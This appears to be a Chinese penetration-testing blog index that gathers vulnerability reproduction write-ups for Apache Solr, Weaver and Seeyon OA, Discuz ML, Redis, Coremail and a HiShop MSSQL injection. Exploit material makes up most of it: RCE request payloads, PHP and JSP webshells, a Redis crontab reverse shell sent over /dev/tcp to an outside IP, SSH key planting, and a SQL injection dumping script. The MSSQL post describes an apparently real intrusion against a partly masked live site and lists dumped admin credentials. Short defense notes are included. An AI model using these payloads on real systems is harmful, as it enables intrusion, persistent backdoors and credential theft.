Classification:Penetration

Classification (Penetration)'s result:

apache solr velocity模板注入漏洞重现

0x00 概述 20191031 网上爆出apache solr velocity模板注入的rce漏洞,该漏洞由国外安全研究员s00py公开,当solr默认插件VelocityResponseWrite中params.resource.loader.enabled参数值为true(默认false),再通过精心构造的get请求即可RCE。 //如果存在solr未授权访问,可post直接修改params.resource.loader.enabled参数值为true 影响范围在solr 5.x – 8.2.0  (with config api)   0x01 漏洞重现 solr-spec 6.6.1 先利用未授权修改params.resource.loader.enabled参数值为true POST /solr/test/config HTTP/1.1 Host: solr:8983 Content-Type: application/json Content-Length: 259 { “update-queryresponsewriter”: { “startup”: “lazy”, “name”: “velocity”, “class”: “solr.VelocityResponseWriter”, “template.base.dir”: “”, “solr.resource.loader.enabled”: “true”, “params.resource.loader.enabled”: “true” } } 再 GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 Host: localhost:8983   0x02 检测工具 https://github.com/theLSA/solr-rce   0x03 防御方案 1.配置授权访问solr控制台。 2.配置文件configoverlay.json设置只读   0x04 参考资料 https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt

泛微OA数据库(MSSQL)配置泄露漏洞重现

0x00 概述 201910,网上爆出泛微数据库(MSSQL)配置泄露漏洞,攻击者可以通过漏洞页面DBconfigReader.jsp将获取的的内容解密,可得到明文数据库配置。 影响范围包括不限于8.0、9.0版。   0x01 漏洞重现 利用ecologyexp.jar   package com;   import org.apache.http.HttpEntity; import org.apache.http.client.methods.CloseableHttpResponse; import org.apache.http.client.methods.HttpGet; import org.apache.http.impl.client.CloseableHttpClient; import org.apache.http.impl.client.HttpClientBuilder; import org.apache.http.util.EntityUtils;   import javax.crypto.Cipher; import javax.crypto.SecretKey; import javax.crypto.SecretKeyFactory; import javax.crypto.spec.DESKeySpec; import java.security.SecureRandom;   public class ReadDbConfig { private final static String DES = “DES”; private final static String key = “1z2x3c4v5b6n”;   public static void main(String[] args) throws Exception { if(args[0]!=null&& args[0].length() !=0){ String url = args[0]+”/mobile/DBconfigReader.jsp”; System.out.println(ReadConfig(url)); }else{ System.err.print(“use: java -jar ecologyExp  http://127.0.0.1”); } }   private static String ReadConfig(String url) throws Exception { CloseableHttpClient httpClient = HttpClientBuilder.create().build(); HttpGet httpGet = new HttpGet(url); CloseableHttpResponse response = httpClient.execute(httpGet); HttpEntity responseEntity = response.getEntity();   byte[] res1 = EntityUtils.toByteArray(responseEntity);   byte[] data = subBytes(res1,10,res1.length-10);   byte [] finaldata =decrypt(data,key.getBytes());   return (new String(finaldata)); }   private static byte[] decrypt(byte[] data, byte[] key) throws Exception {   SecureRandom sr = new SecureRandom(); DESKeySpec dks = new DESKeySpec(key); SecretKeyFactory keyFactory = SecretKeyFactory.getInstance(DES); SecretKey securekey = keyFactory.generateSecret(dks); Cipher cipher = Cipher.getInstance(DES); cipher.init(Cipher.DECRYPT_MODE, securekey, sr);   return cipher.doFinal(data); }   public static byte[]……

绕过HSTS抓包方法整理

0x00 HSTS概述 HSTS的作用是强制客户端(如浏览器)使用HTTPS与服务器创建连接。 只要浏览器曾经与服务器创建过一次安全连接,之后浏览器会强制使用HTTPS,即使链接被换成了HTTP。 另外,如果中间人使用自己的自签名证书来进行攻击,浏览器会给出警告,但是许多用户会忽略警告。HSTS解决了这一问题,一旦服务器发送了HSTS字段,用户将不再允许忽略警告。 HSTS存在一个比较薄弱的环节,那就是浏览器没有当前网站的HSTS信息的时候,或者第一次访问网站的时候,依然需要一次明文的HTTP请求和重定向才能切换到HTTPS,以及刷新HSTS信息。而就是这么一瞬间却给攻击者留下了可乘之机,使得他们可以把这一次的HTTP请求劫持下来,继续中间人攻击。 这是因为首次访问时,浏览器还未收到HSTS,所以仍有可能通过明文HTTP来访问。解决这个不足目前有两种方案,一是浏览器预置HSTS域名列表(Preload List),Google Chrome、Firefox、Internet Explorer和Spartan实现了这一方案。二是将HSTS信息加入到域名系统记录中。但这需要保证DNS的安全性,也就是需要部署域名系统安全扩展。截至2014年这一方案没有大规模部署。 参考https://kuaibao.qq.com/s/20180422G1BB7200?refer=spider   特征如Strict-Transport-Security: max-age=31536000; includeSubDomains   0x01 绕过方法 1.chrome://net-internals/#hsts Delete query   2.右键图标,选择属性,找到”目标”文本框,里面的内容是你的Chrome程序路径,类似 C:UsersAdministratorAppDataLocalGoogleChromeApplicationchrome.exe 在这段文本的后面输入一个空格,然后输入––ignore-certificate-errors   3.使用老版本的Firefox 3.6.25 ,老版本浏览器不识别Strict-Transport-Security字段,再导入burpsuite的根证书到浏览器即可。   4.安装证书作为受信任的根CA,在这种情况下是Burp生成的证书   5.第一步在firefox地址栏输入about:config,选‘i accept the risk’,进入后任意位置右键,选择‘new’,选择‘interger’,输入‘test.currentTimeOffsetSeconds’(无引号),选确定,在输入‘11491200’   6.mitmf   0x02 参考资料 https://kuaibao.qq.com/s/20180422G1BB7200?refer=spider https://www.jianshu.com/p/caa80c7ad45c http://www.wisedream.net/2017/03/17/cryption/crack-https/  

利用redis主从进行RCE

0x00 概述 redis常见利用未授权访问漏洞,参考redis未授权访问漏洞利用 现在还可以利用redis的主从特性进行RCE,详情参考ppt 影响redis4和5。   0x01 重现 环境: 受害机: docker run –name redis5-alpine -d -v $PWD:/data –restart=always -p 6379:6379 hareemca123/redis5:alpine 或者 docker run –name redis4-6379 -p 6379:6379 -d redis:4.0 攻击机: 利用脚本 https://github.com/jas502n/Redis-RCE   0x02 原理 主从握手机制见下图 //此图源自网络 攻击大概流程: 创建一个恶意的redis服务器master,用来发送执行命令的module(exp_lin.so) 关键代码: def handle(self, data): resp = “” phase = 0 if data.find(“PING”) > -1: resp = “+PONG” + CLRF phase = 1 elif data.find(“REPLCONF”) > -1: resp = “+OK” + CLRF phase = 2 elif data.find(“PSYNC”) > -1 or data.find(“SYNC”) > -1: resp = “+FULLRESYNC ” + “Z” * 40 + ” 0″ + CLRF resp += “$” + str(len(payload)) + CLRF resp = resp.encode() resp += payload + CLRF.encode() phase = 3 return resp, phase 2. 在受害redis上将恶意redis设置为master:SLAVEOF vps port。 关键代码: print(“[*] Sending SLAVEOF command to server”) remote.do(“SLAVEOF {} {}”.format(lhost, lport)) back = remote._sock.getsockname() print(“\033[92m[+]\033[0m Accepted connection from {}:{}”.format(back[0], back[1])) 3. 在受害redis设置dbfilename和dir。 关键代码: print(“[*] Setting filename”) remote.do(“CONFIG SET dir /tmp/”) remote.do(“CONFIG SET dbfilename {}”.format(expfile)) 4. 通过同步将module写入受害redis磁盘上:+FULLRESYNC <Z*40> 1\r\n$<len>\r\n<payload> 关键代码: class RogueServer: def __init__(self, lhost, lport): self._host = lhost self._port =……

discuz ml RCE漏洞重现及分析

0x00 概述 7月11日,在网上发现discuz ml(多国语言版)出现RCE漏洞的消息,漏洞在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。   0x01 影响范围 Discuz!ML v.3.4 , Discuz!ML v.3.2 , Discuz!ML v.3.3 product of codersclub.org   0x02 漏洞重现 http://xxx.org/discuzx/portal.php select english or other language   让请求cookie含有xxxx_xxxx_language visit http://xxx.org/discuzx/portal.php again change:4gH4_0df5_language=en’.phpinfo().’; or 4gH4_0df5_language=en’.system(‘whoami&&pwd’).’;   getshell LSmZ_2132_language=es’.file_put_contents%28%27xxxxxxx.php%27%2Curldecode%28%27%253c%253fphp%2520@eval%28%2524_%25%35%30%25%34%66%25%35%33%25%35%34%255b%2522x%2522%255d%29%253b%253f%253e%27%29%29.’;     0x03 检测工具 https://github.com/theLSA/discuz-ml-rce   0x04 漏洞分析 Discuz ml v3.4 为例 dizcuz-ml-34\upload\source\module\portal\portal_index.php:32 include_once template(‘diy:portal/index’); 包含了template函数渲染的文件 进入template函数看看 dizcuz-ml-34\upload\source\function\function_core.php:524 /*vot*/ $cachefile = ‘./data/template/’.DISCUZ_LANG.’_’.(defined(‘STYLEID’) ? STYLEID.’_’ : ‘_’).$templateid.’_’.str_replace(‘/’, ‘_’, $file).’.tpl.php’; if($templateid != 1 && !file_exists(DISCUZ_ROOT.$tplfile) && !file_exists(substr(DISCUZ_ROOT.$tplfile, 0, -4).’.php’) && !file_exists(DISCUZ_ROOT.($tplfile = $tpldir.$filebak.’.htm’))) { $tplfile = ‘./template/default/’.$filebak.’.htm’; } if($gettplfile) { return $tplfile; } checktplrefresh($tplfile, $tplfile, @filemtime(DISCUZ_ROOT.$cachefile), $templateid, $cachefile, $tpldir, $file); return DISCUZ_ROOT.$cachefile; 返回了缓存文件名 根据poc可知是language可控,那就是DISCUZ_LANG可控了。 再看看在哪里赋值 dizcuz-ml-34\upload\source\class\discuz\discuz_application.php:304 // set language from cookies   if($this->var[‘cookie’][‘language’]) {   $lng = strtolower($this->var[‘cookie’][‘language’]); 从cookie-language取值给$lng 338 $this->var[‘oldlanguage’] = $lng; // Store Old Language Value for compare   // define DISCUZ_LANG define(‘DISCUZ_LANG’, $lng);   // set new language to cookie dsetcookie(‘language’, $lng);   // set new language variables $this->var[‘language’] = $lng; $lng赋值给了DISCUZ_LANG 根据poc q3KZ_2132_language=sc’.system(‘whoami’).’; 最终include_once ‘sc’.system(‘whoami’).’_1_1_common_header_forum_index.tpl.php’; 包含闭合引号导致执行了代码。 /× 执行代码这部分存疑,参考https://www.anquanke.com/post/id/181887 ×/   0x05 防御方案 1. 关注 https://bitbucket.org/vot/discuz.ml/commits/all 2.过滤特殊字符(串)如单引号、双引号、括号,点,system、php、eval等。 3.禁止可控变量DISCUZ_LANG作为缓存文件名的一部分。   0x06 结语 Easy to rce!……

记一次mssql注入历程

0x00 发现 目标使用hishop,查看历史漏洞发现一处注入: http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20@@version)%3E0%20and%20%271%27=%271   db_name():xxxshop017 user:xxxx017 @@servername:XXXSHOP   0x01 郁闷的爆表名 那就开始爆xxxshop017的表吧 http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(%27Hishop_HelpCategories%27))%3E0%20and%20%271%27=%271 /× 也可以利用information_schema爆表 http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20table_name%20from%20information_schema.tables%20);– ×/ 写个脚本跑表 #coding:utf-8 #Author:LSA #Description:hishop sqli for /user/UserRefundApply?OrderId= #Date:20190701 import sys import requests from bs4 import BeautifulSoup import re headers = { ‘Cookie’: ”, ‘User-Agent’: ‘Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36’ } global tables_name tables_name = “‘Hishop_HelpCategories'” #print tables_name def brute_tables(url): for i in range(0,300): url = ‘http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(‘ + tables_name + ‘))%3E0%20and%20%271%27=%271’ print url rsp = requests.get(url,headers=headers) soup = BeautifulSoup(rsp.text,”lxml”) title = soup.title.string #print title table_name = re.findall(r”‘(.*?)'”,title) #print table_name[0] global tables_name tables_name = tables_name + ‘,\” + table_name[0] + ‘\” #print tables_name print tables_name def main(url): brute_tables(url) if __name__ == ‘__main__’: url = ‘http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(‘ + tables_name + ‘))%3E0%20and%20%271%27=%271’ main(url) 郁闷开始了,竟然报错了! 经测试,是因为url长度超过2093返回404了,利用burp和chrome都是相同情况,目标系统iis8.5+.net4,在使用相同hishop的另外一个网站(iis7.5)测试不会404…… 猜测可能是运维修改了IIS最大url长度,但是可能性非常低! 无奈,利用xml path爆吧 利用xml path()爆所有表 http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=convert(int,(select%20quotename(name)%20from%20xxxshop017..sysobjects%20where%20xtype=%27U%27%20FOR%20XML%20PATH(%27%27)))%20and%20%271%27=%271   由于表名太多,最后出现省略号,无法爆完所有表。   那就利用not in分两次爆,把第一次用xml path爆出来的表名加入not in。 http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%201=CONVERT(INT,(select%20quotename(name)%20from%20xxxshop017..sysobjects%20where%20xtype=%27U%27%20and%20name%20not%20in%20(%27Hishop_HelpCategories%27,%27Hishop_Hotkeywords%27,%27Hishop_OrderDailyStatistics%27,%27Hishop_CountDownSku%27,%27Hishop_Helps%27,%27Hishop_NavMenu%27,%27Hishop_Gifts%27,%27Hishop_ProductConsultations%27,%27Hishop_MessageTemplates%27,%27CustomMade_Logs%27,%27Hishop_FriendlyLinks%27,%27Hishop_ProductAttributes%27,%27Hishop_MessageContent%27,%27Hishop_FightGroupActivities%27,%27Hishop_PointDetails%27,%27Hishop_MemberMessageBox%27,%27Hishop_FavoriteTags%27,%27Hishop_InpourRequest%27,%27Hishop_ExpressTemplates%27,%27Hishop_ManagerMessageBox%27,%27Hishop_SKUMemberPrice%27,%27Hishop_EmailQueue%27,%27Hishop_SKUItems%27,%27Hishop_DeliveryScope%27,%27Hishop_MenuClickRecords%27,%27Hishop_UserShippingAddresses%27,%27Hishop_DailyAccessStatistics%27,%27Hishop_Logs%27,%27Hishop_ShoppingCarts%27,%27Hishop_Coupons%27,%27Hishop_IntegrationSettings%27,%27Hishop_ProductPreSale%27,%27Hishop_GiftShoppingCarts%27,%27Hishop_PhotoGallery%27,%27Hishop_PromotionRegions%27,%27Hishop_ProductDailyAccessStatistics%27,%27Hishop_Favorite%27,%27Hishop_PhotoCategories%27,%27Hishop_MarketingImages%27,%27Hishop_PhoneCodeIPs%27,%27Hishop_PhoneCodeEveryDayTimes%27,%27Hishop_PrivilegeInRoles%27,%27aspnet_Referrals%27,%27Hishop_PaymentTypes%27,%27Hishop_ProductSpecificationImages%27,%27aspnet_MemberOpenIds%27,%27Hishop_Orders%27,%27Hishop_Products%27,%27Hishop_BalanceDrawRequest%27,%27aspnet_Roles%27,%27Hishop_Shippers%27,%27Hishop_BalanceDetails%27,%27ChangeStockLog%27,%27Hishop_Service%27,%27aspnet_MemberGrades%27,%27Hishop_RelatedProducts%27,%27aspnet_OpenIdSettings%27,%27Custom_Etickets%27,%27Hishop_RelatedArticsProducts%27,%27aspnet_MemberWXShoppingGuider%27,%27Hishop_Regions%27,%27aspnet_MemberWXReferral%27,%27Custom_EticketsResult%27,%27Hishop_RedEnvelopeSendRecord%27,%27aspnet_MemberTags%27,%27Hishop_RedEnvelopeGetRecord%27,%27Hishop_CombinationBuySKU%27)FOR%20XML%20PATH(%27%27)))%20and%20%271%27=%271       0x02 获取列名和数据 判断管理员帐号密码可能在 aspnet_Members或aspnet_Managers这两个表中 先看aspnet_Members http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20*%20from%20xxxshop017..aspnet_Members%20FOR%20XML%20PATH(%27%27))–   得到帐号admin密码xxx2018@ 利用where、not in可以获取多个数据 有些帐号的密码经过了加密(疑似RSA) <Password>dNPQ/7vfChaeOmCL7Wb8mRmRq9U=</Password><PasswordSalt>5pk/VC1CM8ARImoqpquGpg==</PasswordSalt> 再看看aspnet_Managers http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20*%20from%20xxxshop017..aspnet_Managers%20FOR%20XML%20PATH(%27%27))–   密码base16/32/64无法解密 疑似经过了rsa加密。   利用admin xxx2018@登录失败。 猜测可能是数据库不对,尝试爆所有数据库。 利用xml paht()爆所有库 http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%20(select%20quotename(name)%20from%20master..sysdatabases%20FOR%20XML%20PATH(%27%27))%3E0%20and%20%271%27=%271   得到可能存在帐号密码的数据库(域名是mall) [xxxmall] 尝试跨库查询 http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=convert(int,(select%20quotename(name)%20from%20xxxmall..sysobjects%20where%20xtype=%27U%27%20FOR%20XML%20PATH(%27%27)))%20and%20%271%27=%271……

致远oa(seeyon)文件上传漏洞重现及分析

0x00 影响范围 经本人测试,如下 v6.1sp2 a6+v7sp3 A8-v5 v6.1sp1 实际范围不止以上版本。 0x01 漏洞重现 验证: 网上流传的exp: DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV OPTION=S3WYOSWLBSGr currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66 CREATEDATE=wUghPB3szB3Xwg66 RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6 originalFileId=wV66 originalCreateDate=wUghPB3szB3Xwg66 FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6 needReadFile=yRWZdAS6 originalCreateDate=wLSGP4oEzLKAz4=iz=66 <%@ page language=”java” import=”java.util.*,java.io.*” pageEncoding=”UTF-8″%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+”\n”);}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if(“asasd3344”.equals(request.getParameter(“pwd”))&&!””.equals(request.getParameter(“cmd”))){out.println(“<pre>”+excuteCmd(request.getParameter(“cmd”)) + “</pre>”);}else{out.println(“:-)”);}%>6e4f045d4b8506bf492ada7e3390d7ce   POC: //根据exp1修改 a6+v7sp3 发送数据包: POST /seeyon/htmlofficeservlet HTTP/1.1 Host: xxx.com.cn Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: JSESSIONID=AD5D04D5A82032FCB3C91028ADF9F839; loginPageURL= Connection: close Content-Length: 462   DBSTEP V3.0 345 0 21 DBSTEP=OKMLlKlV OPTION=S3WYOSWLBSGr currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66 CREATEDATE=wUghPB3szB3Xwg66 RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6 originalFileId=wV66 originalCreateDate=wUghPB3szB3Xwg66 FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdbrJuz7T2dEg6 needReadFile=yRWZdAS6 originalCreateDate=wLSGP4oEzLKAz4=iz=66 only-test-seeyon-rcexxxxxx   EXP0:传Cknife马 v6.1sp2 POST /seeyon/htmlofficeservlet HTTP/1.1 Host: 58.1.1.2:81 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: JSESSIONID=0d218993-e7c3-4caa-8281-42c886e5f42c; loginPageURL=”” Connection: close Content-Length: 9540   DBSTEP V3.0 348 0 9122 DBSTEP=OKMLlKlV OPTION=S3WYOSWLBSGr……

coremail 配置信息泄露及接口未授权漏洞重现

0x00 配置信息泄漏 POC: mailsms/s?func=ADMIN:appState&dumpConfig=/ 可以获取数据库配置信息和推送账号。 有些可能限制ip。 可以进入后台管理。 有些是404,可能打了补丁或者是老漏洞了,也可能是版本问题。 0x01 webservice接口未授权   进一步获取数据失败。      

redis未授权访问漏洞利用

0x00 基本命令 还有flushall 修改相关配置以重现漏洞 config: redis.windows.conf: bind 0.0.0.0 Protected-mode no redis-server.exe “redis.windows.conf” /* redis持久化存储 dump.rdp文件: RDB可以将某一时刻的所有数据写入硬盘中,通过RDB文件,可以将redis数据恢复到某一历史时刻(snapshots)。   save/bgsave save 900 1 save 300 10 save 60 10000 — AOF会在redis执行写命令时,将被执行的写命令复制到磁盘aof文件中,恢复数据的时候,redis会在原有基础上依次执行AOF文件中的写命令,从而恢复数据。   appendonly yes appendfilename “appendonly.aof” appendfsync everysec */ 0x01 反弹shell 192.168.138.129:6379> set x “\n* * * * * bash -i >& /dev/tcp/192.168.43.237/7788 0>&1\n” OK 192.168.138.129:6379> config set dir /var/spool/ OK 192.168.138.129:6379> config set dbfilename root OK 192.168.138.129:6379> save 未能成功反弹,原因可能是debian,ubuntu的计划任务的格式很严格,须执行 crontab -u root /var/spool/cron/crontabs/root 通过语法检查才能执行计划任务。 也可能是权限或格式(不能有其他脏字符)问题。 只有centos能成功。   0x02 添加ssh key 或者 cat sshpubkey.txt | redis-cli -h 192.168.138.129 -x set x $ redis-cli -h 192.168.138.129 $ 192.168.138.129:6379> config set dir /root/.ssh/ OK $ 192.168.138.129:6379> config get dir 1) “dir” 2) “/root/.ssh” $ 192.168.138.129:6379> config set dbfilename “authorized_keys” OK $ 192.168.138.129:6379> save OK   0x03 Web目录写webshell 192.168.43.237:6379> config set dir D:\phpStudy\WWW\ OK 192.168.43.237:6379> config set dbfilename redishell.php OK 192.168.43.237:6379> set rs “<?php @eval($_POST[x]);?>” OK 192.168.43.237:6379> save   0x04 防御方案 1. 加密码 redis.conf: requirepass mypassword   2. 本地访问: redis.conf: bind 127.0.0.1   3. 改权限 chmod 400 ~/.ssh/authorized_keys chattr +i ~/.ssh/authorized_keys chattr +i ~/.ssh